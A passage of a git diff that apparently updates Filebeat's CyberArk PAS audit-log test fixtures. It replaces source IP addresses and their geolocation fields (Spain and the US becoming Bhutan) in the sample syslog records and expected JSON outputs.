         "cyberarkpas.audit.safe": "PSMPADBridgeConf",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMP_ADB_localhost.localdomain",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:37",
         "event.action": "add owner",
         "event.category": [
@@ -835,30 +796,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 7493,
+        "log.offset": 7480,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PSMP_ADB_localhost.localdomain"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -877,7 +835,7 @@
         "cyberarkpas.audit.safe": "PSMPADBridgeCustom",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMP_ADB_AppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 01:11:38",
         "event.action": "add owner",
         "event.category": [
@@ -897,30 +855,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 8093,
+        "log.offset": 8079,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PSMP_ADB_AppUsers"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -939,7 +894,7 @@
         "cyberarkpas.audit.safe": "PVWAConfig",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMApp_VAGRANT",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 09:59:32",
         "event.action": "add owner",
         "event.category": [
@@ -959,30 +914,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 8682,
+        "log.offset": 8667,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PSMApp_VAGRANT"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log b/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log
index 16ec40c4f3c5..0360bee64592 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log
@@ -1,7 +1,7 @@
-<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
-<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
-<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
-<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
-<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
-<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
-<5>1 2021-03-11T17:38:14Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:14</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:14Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>33</MessageID>\n    <Desc>Update Owner</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Update Owner</Action>\n    <SourceUser>Auditors</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update Owner</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
+<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
+<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
+<5>1 2021-03-11T17:38:14Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:14</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:14Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>33</MessageID>\n    <Desc>Update Owner</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Update Owner</Action>\n    <SourceUser>Auditors</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update Owner</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}}
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log-expected.json
index 6c272ceb7127..a7009d3e0cb6 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log-expected.json
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log-expected.json
@@ -10,7 +10,7 @@
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAAppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:16:49",
         "event.action": "update owner",
         "event.category": [
@@ -37,23 +37,20 @@
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PVWAAppUsers"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -72,7 +69,7 @@
         "cyberarkpas.audit.safe": "PVWAConfig",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMApp_VAGRANT",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:16:50",
         "event.action": "update owner",
         "event.category": [
@@ -92,30 +89,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 578,
+        "log.offset": 577,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PSMApp_VAGRANT"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -134,7 +128,7 @@
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMAppUsers",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:16:51",
         "event.action": "update owner",
         "event.category": [
@@ -154,30 +148,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1165,
+        "log.offset": 1163,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PSMAppUsers"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -196,7 +187,7 @@
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PSMMaster",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:16:51",
         "event.action": "update owner",
         "event.category": [
@@ -216,30 +207,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 1742,
+        "log.offset": 1739,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "PSMMaster"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -258,7 +246,7 @@
         "cyberarkpas.audit.safe": "PSMUniversalConnectors",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Vault Admins",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 10 10:16:53",
         "event.action": "update owner",
         "event.category": [
@@ -278,30 +266,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2317,
+        "log.offset": 2313,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Administrator",
             "Vault Admins"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -320,7 +305,7 @@
         "cyberarkpas.audit.safe": "PSM",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "PVWAAppUsers",
-        "cyberarkpas.audit.station": "35.192.121.42",
+        "cyberarkpas.audit.station": "67.43.156.12",
         "cyberarkpas.audit.timestamp": "Mar 10 14:19:18",
         "event.action": "update owner",
         "event.category": [
@@ -340,29 +325,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 2914,
+        "log.offset": 2909,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "35.192.121.42"
+            "67.43.156.12"
         ],
         "related.user": [
             "Administrator",
             "PVWAAppUsers"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "35.192.121.42",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 38.6583,
-        "source.geo.location.lon": -77.2481,
-        "source.geo.region_iso_code": "US-VA",
-        "source.geo.region_name": "Virginia",
-        "source.ip": "35.192.121.42",
+        "source.address": "67.43.156.12",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
@@ -377,12 +360,12 @@
         "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:14Z",
         "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
         "cyberarkpas.audit.message": "Update Owner",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:14</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:14Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>33</MessageID>\n    <Desc>Update Owner</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Update Owner</Action>\n    <SourceUser>Auditors</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File></File>\n    <Station>81.32.170.205</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update Owner</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:38:14</Timestamp>\n    <IsoTimestamp>2021-03-11T17:38:14Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>33</MessageID>\n    <Desc>Update Owner</Desc>\n    <Severity>Info</Severity>\n    <Issuer>PSMPApp_VAGRANT</Issuer>\n    <Action>Update Owner</Action>\n    <SourceUser>Auditors</SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSMRecordings</Safe>\n    <File></File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails></ExtraDetails>\n    <Message>Update Owner</Message>\n    <GatewayStation></GatewayStation>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "PSMRecordings",
         "cyberarkpas.audit.severity": "Info",
         "cyberarkpas.audit.source_user": "Auditors",
-        "cyberarkpas.audit.station": "81.32.170.205",
+        "cyberarkpas.audit.station": "67.43.156.14",
         "cyberarkpas.audit.timestamp": "Mar 11 09:38:14",
         "event.action": "update owner",
         "event.category": [
@@ -402,30 +385,27 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 3492,
+        "log.offset": 3486,
         "log.syslog.priority": "5",
         "observer.hostname": "VAULT",
         "observer.product": "Vault",
         "observer.vendor": "Cyber-Ark",
         "observer.version": "11.7.0000",
         "related.ip": [
-            "81.32.170.205"
+            "67.43.156.14"
         ],
         "related.user": [
             "Auditors",
             "PSMPApp_VAGRANT"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "tags": [
             "cyberarkpas.audit",
             "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log b/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log
index 6c959f21d653..f03cca4fde99 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log
@@ -1,7 +1,7 @@
